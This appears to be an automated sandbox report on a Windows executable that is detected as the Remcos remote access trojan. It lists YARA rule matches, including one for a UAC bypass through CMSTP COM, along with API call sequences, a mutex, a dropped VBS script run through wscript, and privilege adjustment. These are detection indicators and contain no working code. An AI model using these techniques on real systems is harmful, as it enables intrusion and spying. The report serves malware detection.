                        Source: Yara matchFile source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Contains functionalty to change the wallpaper
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041BB87 SystemParametersInfoW,0_2_0041BB87

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041ACD1
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041ACFD OpenProcess,NtResumeProcess,CloseHandle,0_2_0041ACFD
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004158B9
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004520E20_2_004520E2
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041D0810_2_0041D081
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043D0A80_2_0043D0A8
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004371600_2_00437160
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004361BA0_2_004361BA
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004262640_2_00426264
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004313870_2_00431387
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043652C0_2_0043652C
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041E5EF0_2_0041E5EF
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0044C7490_2_0044C749
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004367D60_2_004367D6
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_004267DB0_2_004267DB
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043C9ED0_2_0043C9ED
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00432A590_2_00432A59
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00436A9D0_2_00436A9D
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043CC1C0_2_0043CC1C
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00436D580_2_00436D58
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00434D320_2_00434D32
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0043CE4B0_2_0043CE4B
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00440E300_2_00440E30
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00426E830_2_00426E83
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00412F450_2_00412F45
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00452F100_2_00452F10
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00426FBD0_2_00426FBD
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: String function: 004338B5 appears 42 times
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: String function: 00433FC0 appears 55 times
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.0000000000872000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000002.3307385684.000000000086D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00416AB7
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040E219
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041A64F
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BD4
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].jsonJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-IUHLZ9
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbsJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Software\0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Rmc-IUHLZ90_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Exe0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Exe0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Rmc-IUHLZ90_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: 0DG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Inj0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Inj0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: BG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: BG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: BG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: @CG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: BG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: exepath0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: @CG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: exepath0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: BG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: licence0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: `=G0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: dCG0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: Administrator0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: User0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: del0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: del0_2_0040D767
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCommand line argument: del0_2_0040D767
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeReversingLabs: Detection: 71%
                        Source: unknownProcess created: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe"
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"
